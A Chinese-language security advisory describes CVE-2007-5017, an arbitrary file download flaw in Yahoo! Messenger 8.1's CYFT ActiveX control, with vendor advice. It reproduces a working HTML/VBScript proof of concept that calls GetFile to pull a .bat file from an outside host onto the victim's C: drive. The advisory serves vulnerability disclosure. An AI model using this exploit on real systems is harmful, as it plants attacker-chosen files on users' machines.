安全研究

安全漏洞
雅虎通CYFT ft60.dll ActiveX控件GetFile方式任意文件上传漏洞

发布日期:2007-09-19
更新日期:2007-09-19

受影响系统:
Yahoo! Messenger 8.1.421
描述:
BUGTRAQ  ID: 25727
CVE(CAN) ID: CVE-2007-5017

雅虎通是一款非常流行的即时通讯工具。

雅虎通的CYFT ActiveX控件实现上存在漏洞,远程攻击者可能利用此漏洞向用户系统上传任意文件。

CYFT ActiveX控件的GetFile()方式没有对用户提交的参数做充分的检查过滤,远程攻击者可以通过提供畸形参数向用户系统的任意位置上传任意文件,但是相关的控件默认情况下不能远程调用。

<*来源:shinnai (shinnai@autistici.org
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

shinnai (shinnai@autistici.org)提供了如下测试方法:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download</b>
url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>

Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7

<b>Marked as:
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False</b>

From remote: depends by Internet Explorer settings
From local: yes

<b>Description:
This contron contains a "GetFile()" method which allows to download, on
user's pc, an arbitrary file pased as argument.
Remote execution depends by Internet Explorer settings, local execution
works very well.</b>

<b>greetz to:<font color='red'> skyhole (or YAG KOHHA)</font> for inspiration</b>
-----------------------------------------------------------------------------
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   test.GetFile "http://www.shinnai.altervista.org/shinnai.bat","c:\\shinnai.bat",5,1,"shinnai"
   MsgBox "Exploit completed"
  End Sub
</script>
</span></span>
</code></pre>

建议:
厂商补丁:

Yahoo!
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://messenger.yahoo.com/

浏览次数:3082
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障